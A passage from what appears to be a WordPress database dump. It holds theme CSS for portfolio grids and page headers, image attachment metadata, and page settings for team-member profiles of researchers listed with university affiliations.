 -ms-flex-flow: column nowrap;\n    flex-flow: column nowrap;\n    margin-top: 20px;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on article {\n    border: none;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.centered-layout-list article {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    width: 100%;\n    margin: 0;\n    top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content:after {\n    display: none;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-even .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-thumbnail-wrap {\n    -webkit-order: 0;\n    -moz-order: 0;\n    -ms-flex-order: 0;\n    order: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-title-content {\n    -webkit-order: 1;\n    -moz-order: 1;\n    -ms-flex-order: 1;\n    order: 1;\n    width: 100%;\n    padding: 20px 20px 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-content {\n    -webkit-order: 2;\n    -moz-order: 2;\n    -ms-flex-order: 2;\n    order: 2;\n    padding-top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    padding: 20px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title {\n    margin: 3px 0 5px;\n    font-size: 20px;\n    line-height: 26px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n    margin: 5px 0 5px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n    margin: 15px 0 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details {\n    margin: 5px 0 10px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details.details-type-link {\n    margin-bottom: 2px;\n  }\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n  width: calc(33.333333333333%) * 2;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width:not(.centered-layout-list):not(.content-bg-on) .dt-css-grid {\n  grid-row-gap: 0px;\n}\n@media screen and (max-width: 1199px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(33.333333333333%)*2;\n  }\n}\n@media screen and (max-width: 991px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(50%)*2;\n  }\n}\n@media screen and (max-width: 767px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n    grid-column: span 1;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(100%)*2;\n  }\n}\n\";}'),
(11158,2717,'_edit_lock','1665756321:1'),
(11159,2718,'_wp_attached_file','2022/10/w101-e1665756219243.jpg'),
(11160,2718,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:200;s:6:\"height\";i:222;s:4:\"file\";s:31:\"2022/10/w101-e1665756219243.jpg\";s:8:\"filesize\";i:87047;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"w101-271x300.jpg\";s:5:\"width\";i:271;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10073;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:31:\"w101-e1665756219243-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4177;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11161,2717,'_thumbnail_id','2718'),
(11162,2717,'_edit_last','1'),
(11163,2717,'_dt_sidebar_position','disabled'),
(11164,2717,'_dt_sidebar_widgetarea_id','sidebar_1'),
(11165,2717,'_dt_sidebar_hide_on_mobile','0'),
(11166,2717,'_dt_footer_show','1'),
(11167,2717,'_dt_footer_widgetarea_id','sidebar_2'),
(11168,2717,'_dt_footer_hide_on_mobile','0'),
(11169,2717,'_dt_header_title','fancy'),
(11170,2717,'_dt_header_background','normal'),
(11171,2717,'_dt_header_background_below_slideshow','disabled'),
(11172,2717,'_dt_header_transparent_bg_color_scheme','light'),
(11173,2717,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(11174,2717,'_dt_header_transparent_top_bar_bg_opacity','25'),
(11175,2717,'_dt_header_transparent_bg_color','#000000'),
(11176,2717,'_dt_header_transparent_bg_opacity','50'),
(11177,2717,'_dt_header_disabled_background','normal'),
(11178,2717,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(11179,2717,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(11180,2717,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(11181,2717,'_dt_header_disabled_transparent_bg_color','#000000'),
(11182,2717,'_dt_header_disabled_transparent_bg_opacity','50'),
(11183,2717,'_dt_page_overrides_top_margin',''),
(11184,2717,'_dt_page_overrides_right_margin',''),
(11185,2717,'_dt_page_overrides_bottom_margin',''),
(11186,2717,'_dt_page_overrides_left_margin',''),
(11187,2717,'_dt_mobile_page_padding_top',''),
(11188,2717,'_dt_mobile_page_padding_right',''),
(11189,2717,'_dt_mobile_page_padding_bottom',''),
(11190,2717,'_dt_mobile_page_padding_left',''),
(11191,2717,'_dt_fancy_header_layout_heading',''),
(11192,2717,'_dt_fancy_header_title_aligment','center'),
(11193,2717,'_dt_fancy_header_height','300'),
(11194,2717,'_dt_fancy_header_padding-top','0px'),
(11195,2717,'_dt_fancy_header_padding-bottom','0px'),
(11196,2717,'_dt_fancy_header_breadcrumbs_heading',''),
(11197,2717,'_dt_fancy_header_breadcrumbs','disabled'),
(11198,2717,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(11199,2717,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(11200,2717,'_dt_fancy_header_title_heading',''),
(11201,2717,'_dt_fancy_header_title_mode','custom'),
(11202,2717,'_dt_fancy_header_title','Mehdi Maboudi University of Braunschweig, Germany (ICWG II/1-b)'),
(11203,2717,'_dt_fancy_header_title_font_size','30'),
(11204,2717,'_dt_fancy_header_title_line_height','36'),
(11205,2717,'_dt_fancy_header_text_transform','none'),
(11206,2717,'_dt_fancy_header_title_color_mode','color'),
(11207,2717,'_dt_fancy_header_title_color','#ffffff'),
(11208,2717,'_dt_fancy_header_subtitle_heading',''),
(11209,2717,'_dt_fancy_header_subtitle',''),
(11210,2717,'_dt_fancy_header_subtitle_font_size','18'),
(11211,2717,'_dt_fancy_header_subtitle_line_height','26'),
(11212,2717,'_dt_fancy_header_subtitle_text_transform','none'),
(11213,2717,'_dt_fancy_header_subtitle_color_mode','color'),
(11214,2717,'_dt_fancy_header_subtitle_color','#ffffff'),
(11215,2717,'_dt_fancy_header_bg_heading',''),
(11216,2717,'_dt_fancy_header_bg_color','#222222'),
(11217,2717,'_dt_fancy_header_bg_image_origin','custom'),
(11218,2717,'_dt_fancy_header_bg_image','a:0:{}'),
(11219,2717,'_dt_fancy_header_bg_repeat','no-repeat'),
(11220,2717,'_dt_fancy_header_bg_position_x','center'),
(11221,2717,'_dt_fancy_header_bg_position_y','center'),
(11222,2717,'_dt_fancy_header_bg_fullscreen','1'),
(11223,2717,'_dt_fancy_header_bg_overlay','0'),
(11224,2717,'_dt_fancy_header_overlay_color','#000'),
(11225,2717,'_dt_fancy_header_bg_overlay_opacity','50'),
(11226,2717,'_dt_fancy_header_scroll_effect','default'),
(11227,2717,'_dt_fancy_header_bg_parallax','0.5'),
(11228,2717,'_dt_fancy_header_responsiveness_heading',''),
(11229,2717,'_dt_fancy_header_responsiveness','enabled'),
(11230,2717,'_dt_fancy_header_responsiveness_switch','778px'),
(11231,2717,'_dt_fancy_header_responsive_height','70'),
(11232,2717,'_dt_fancy_header_responsive_font_size','30'),
(11233,2717,'_dt_fancy_header_responsive_title_line_height','38'),
(11234,2717,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(11235,2717,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(11236,2717,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(11237,2717,'_dt_teammate_options_go_to_single','1'),
(11238,2717,'_dt_teammate_options_position',''),
(11239,2717,'_dt_teammate_options_website',''),
(11240,2717,'_dt_teammate_options_mail',''),
(11241,2717,'_dt_teammate_options_facebook',''),
(11242,2717,'_dt_teammate_options_twitter',''),
(11243,2717,'_dt_teammate_options_dribbble',''),
(11244,2717,'_dt_teammate_options_you-tube',''),
(11245,2717,'_dt_teammate_options_rss',''),
(11246,2717,'_dt_teammate_options_delicious',''),
(11247,2717,'_dt_teammate_options_flickr',''),
(11248,2717,'_dt_teammate_options_lastfm',''),
(11249,2717,'_dt_teammate_options_linkedin',''),
(11250,2717,'_dt_teammate_options_vimeo',''),
(11251,2717,'_dt_teammate_options_tumbler',''),
(11252,2717,'_dt_teammate_options_pinterest',''),
(11253,2717,'_dt_teammate_options_devian',''),
(11254,2717,'_dt_teammate_options_skype',''),
(11255,2717,'_dt_teammate_options_github',''),
(11256,2717,'_dt_teammate_options_instagram',''),
(11257,2717,'_dt_teammate_options_stumbleupon',''),
(11258,2717,'_dt_teammate_options_behance',''),
(11259,2717,'_dt_teammate_options_px-500',''),
(11260,2717,'_dt_teammate_options_tripedvisor',''),
(11261,2717,'_dt_teammate_options_vk',''),
(11262,2717,'_dt_teammate_options_foursquare',''),
(11263,2717,'_dt_teammate_options_xing',''),
(11264,2717,'_dt_teammate_options_weibo',''),
(11265,2717,'_dt_teammate_options_odnoklassniki',''),
(11266,2717,'_dt_teammate_options_research-gate',''),
(11267,2717,'_dt_teammate_options_yelp',''),
(11268,2717,'_dt_teammate_options_blogger',''),
(11269,2717,'_dt_teammate_options_soundcloud',''),
(11270,2717,'_dt_teammate_options_viber',''),
(11271,2717,'_dt_teammate_options_whatsapp',''),
(11272,2717,'_dt_teammate_options_reddit',''),
(11273,2717,'_dt_teammate_options_snapchat',''),
(11274,2717,'_dt_teammate_options_telegram',''),
(11275,2717,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(11276,2719,'_edit_lock','1665756355:1'),
(11277,2720,'_wp_attached_file','2022/10/w102-e1665756191504.jpg'),
(11278,2720,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:200;s:6:\"height\";i:277;s:4:\"file\";s:31:\"2022/10/w102-e1665756191504.jpg\";s:8:\"filesize\";i:71767;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"w102-216x300.jpg\";s:5:\"width\";i:216;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10343;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:31:\"w102-e1665756191504-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4994;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11279,2719,'_thumbnail_id','2720'),
(11280,2719,'_edit_last','1'),
(11281,2719,'_dt_sidebar_position','right'),
(11282,2719,'_dt_sidebar_widgetarea_id','sidebar_1'),
(11283,2719,'_dt_sidebar_hide_on_mobile','0'),
(11284,2719,'_dt_footer_show','1'),
(11285,2719,'_dt_footer_widgetarea_id','sidebar_2'),
(11286,2719,'_dt_footer_hide_on_mobile','0'),
(11287,2719,'_dt_header_title','fancy'),
(11288,2719,'_dt_header_background','normal'),
(11289,2719,'_dt_header_background_below_slideshow','disabled'),
(11290,2719,'_dt_header_transparent_bg_color_scheme','light'),
(11291,2719,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(11292,2719,'_dt_header_transparent_top_bar_bg_opacity','25'),
(11293,2719,'_dt_header_transparent_bg_color','#000000'),
(11294,2719,'_dt_header_transparent_bg_opacity','50'),
(11295,2719,'_dt_header_disabled_background','normal'),
(11296,2719,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(11297,2719,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(11298,2719,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(11299,2719,'_dt_header_disabled_transparent_bg_color','#000000'),
(11300,2719,'_dt_header_disabled_transparent_bg_opacity','50'),
(11301,2719,'_dt_page_overrides_top_margin',''),
(11302,2719,'_dt_page_overrides_right_margin',''),
(11303,2719,'_dt_page_overrides_bottom_margin',''),
(11304,2719,'_dt_page_overrides_left_margin',''),
(11305,2719,'_dt_mobile_page_padding_top',''),
(11306,2719,'_dt_mobile_page_padding_right',''),
(11307,2719,'_dt_mobile_page_padding_bottom',''),
(11308,2719,'_dt_mobile_page_padding_left',''),
(11309,2719,'_dt_fancy_header_layout_heading',''),
(11310,2719,'_dt_fancy_header_title_aligment','center'),
(11311,2719,'_dt_fancy_header_height','300'),
(11312,2719,'_dt_fancy_header_padding-top','0px'),
(11313,2719,'_dt_fancy_header_padding-bottom','0px'),
(11314,2719,'_dt_fancy_header_breadcrumbs_heading',''),
(11315,2719,'_dt_fancy_header_breadcrumbs','disabled'),
(11316,2719,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(11317,2719,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(11318,2719,'_dt_fancy_header_title_heading',''),
(11319,2719,'_dt_fancy_header_title_mode','custom'),
(11320,2719,'_dt_fancy_header_title','Yelda Turkan Oregon State University, USA (ICWG II/1-b)'),
(11321,2719,'_dt_fancy_header_title_font_size','30'),
(11322,2719,'_dt_fancy_header_title_line_height','36'),
(11323,2719,'_dt_fancy_header_text_transform','none'),
(11324,2719,'_dt_fancy_header_title_color_mode','color'),
(11325,2719,'_dt_fancy_header_title_color','#ffffff'),
(11326,2719,'_dt_fancy_header_subtitle_heading',''),
(11327,2719,'_dt_fancy_header_subtitle',''),
(11328,2719,'_dt_fancy_header_subtitle_font_size','18'),
(11329,2719,'_dt_fancy_header_subtitle_line_height','26'),
(11330,2719,'_dt_fancy_header_subtitle_text_transform','none'),
(11331,2719,'_dt_fancy_header_subtitle_color_mode','color'),
(11332,2719,'_dt_fancy_header_subtitle_color','#ffffff'),
(11333,2719,'_dt_fancy_header_bg_heading',''),
(11334,2719,'_dt_fancy_header_bg_color','#222222'),
(11335,2719,'_dt_fancy_header_bg_image_origin','custom'),
(11336,2719,'_dt_fancy_header_bg_image','a:0:{}'),
(11337,2719,'_dt_fancy_header_bg_repeat','no-repeat'),
(11338,2719,'_dt_fancy_header_bg_position_x','center'),
(11339,2719,'_dt_fancy_header_bg_position_y','center'),
(11340,2719,'_dt_fancy_header_bg_fullscreen','1'),
(11341,2719,'_dt_fancy_header_bg_overlay','0'),
(11342,2719,'_dt_fancy_header_overlay_color','#000'),
(11343,2719,'_dt_fancy_header_bg_overlay_opacity','50'),
(11344,2719,'_dt_fancy_header_scroll_effect','default'),
(11345,2719,'_dt_fancy_header_bg_parallax','0.5'),
(11346,2719,'_dt_fancy_header_responsiveness_heading',''),
(11347,2719,'_dt_fancy_header_responsiveness','enabled'),
(11348,2719,'_dt_fancy_header_responsiveness_switch','778px'),
(11349,2719,'_dt_fancy_header_responsive_height','70'),
(11350,2719,'_dt_fancy_header_responsive_font_size','30'),
(11351,2719,'_dt_fancy_header_responsive_title_line_height','38'),
(11352,2719,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(11353,2719,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(11354,2719,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(11355,2719,'_dt_teammate_options_go_to_single','1'),
(11356,2719,'_dt_teammate_options_position',''),
(11357,2719,'_dt_teammate_options_website',''),
(11358,2719,'_dt_teammate_options_mail',''),
(11359,2719,'_dt_teammate_options_facebook',''),
(11360,2719,'_dt_teammate_options_twitter',''),
(11361,2719,'_dt_teammate_options_dribbble',''),
(11362,2719,'_dt_teammate_options_you-tube',''),
(11363,2719,'_dt_teammate_options_rss',''),
(11364,2719,'_dt_teammate_options_delicious',''),
(11365,2719,'_dt_teammate_options_flickr',''),
(11366,2719,'_dt_teammate_options_lastfm',''),
(11367,2719,'_dt_teammate_options_linkedin',''),
(11368,2719,'_dt_teammate_options_vimeo',''),
(11369,2719,'_dt_teammate_options_tumbler',''),
(11370,2719,'_dt_teammate_options_pinterest',''),
(11371,2719,'_dt_teammate_options_devian',''),
(11372,2719,'_dt_teammate_options_skype',''),
(11373,2719,'_dt_teammate_options_github',''),
(11374,2719,'_dt_teammate_options_instagram',''),
(11375,2719,'_dt_teammate_options_stumbleupon',''),
(11376,2719,'_dt_teammate_options_behance',''),
(11377,2719,'_dt_teammate_options_px-500',''),
(11378,2719,'_dt_teammate_options_tripedvisor',''),
(11379,2719,'_dt_teammate_options_vk',''),
(11380,2719,'_dt_teammate_options_foursquare',''),
(11381,2719,'_dt_teammate_options_xing',''),
(11382,2719,'_dt_teammate_options_weibo',''),
(11383,2719,'_dt_teammate_options_odnoklassniki',''),
(11384,2719,'_dt_teammate_options_research-gate',''),
(11385,2719,'_dt_teammate_options_yelp',''),
(11386,2719,'_dt_teammate_options_blogger',''),
(11387,2719,'_dt_teammate_options_soundcloud',''),
(11388,2719,'_dt_teammate_options_viber',''),
(11389,2719,'_dt_teammate_options_whatsapp',''),
(11390,2719,'_dt_teammate_options_reddit',''),
(11391,2719,'_dt_teammate_options_snapchat',''),
(11392,2719,'_dt_teammate_options_telegram',''),
(11393,2719,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(11394,2721,'_edit_lock','1665756320:1'),
(11395,2722,'_wp_attached_file','2022/10/w103-e1665756153549.jpg'),
(11396,2722,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:200;s:6:\"height\";i:247;s:4:\"file\";s:31:\"2022/10/w103-e1665756153549.jpg\";s:8:\"filesize\";i:23658;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"w103-243x300.jpg\";s:5:\"width\";i:243;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10991;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:31:\"w103-e1665756153549-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4983;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11397,2721,'_thumbnail_id','2722'),
(11398,2721,'_edit_last','1'),
(11399,2721,'_dt_sidebar_position','disabled'),
(11400,2721,'_dt_sidebar_widgetarea_id','sidebar_1'),
(11401,2721,'_dt_sidebar_hide_on_mobile','0'),
(11402,2721,'_dt_footer_show','1'),
(11403,2721,'_dt_footer_widgetarea_id','sidebar_2'),
(11404,2721,'_dt_footer_hide_on_mobile','0'),
(11405,2721,'_dt_header_title','fancy'),
(11406,2721,'_dt_header_background','normal'),
(11407,2721,'_dt_header_background_below_slideshow','disabled'),
(11408,2721,'_dt_header_transparent_bg_color_scheme','light'),
(11409,2721,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
